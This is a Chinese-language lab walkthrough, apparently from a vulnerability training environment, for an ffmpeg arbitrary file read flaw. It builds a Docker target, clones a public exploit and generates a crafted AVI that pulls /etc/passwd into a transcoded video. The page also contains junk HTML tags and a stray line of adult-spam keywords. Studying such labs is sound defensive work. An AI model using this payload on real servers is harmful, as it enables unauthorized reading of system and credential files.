<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    ffmpeg 任意文件讀取漏洞環境

    Path ffmpeg/phdays

    參考資料:

    http://bobao.360.cn/learning/detail/4032.html
    https://hackerone.com/reports/242831
    https://github.com/neex/ffmpeg-avi-m3u-xbin

    環境搭建

    編譯及啟動環境

    docker-compose build
    docker-compose up -d

    環境啟動后監聽8080端口,訪問http://your-ip:8080/即可查看。

    漏洞利用

    漏洞原理不再贅述,直接下載exp,并生成payload:

    # 下載exp
    git clone https://github.com/neex/ffmpeg-avi-m3u-xbin
    cd ffmpeg-avi-m3u-xbin
    
    # 生成payload
    ./gen_xbin_avi.py file:///etc/passwd exp.avi

    生成exp.avi,在http://your-ip:8080/上傳。后端將會將你上傳的視頻用ffmpeg轉碼后顯示,轉碼時因為ffmpeg的任意文件讀取漏洞,可將文件信息讀取到視頻中:

    你也可以執行docker-compose exec web bash進入本環境內部,測試ffmpeg。

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类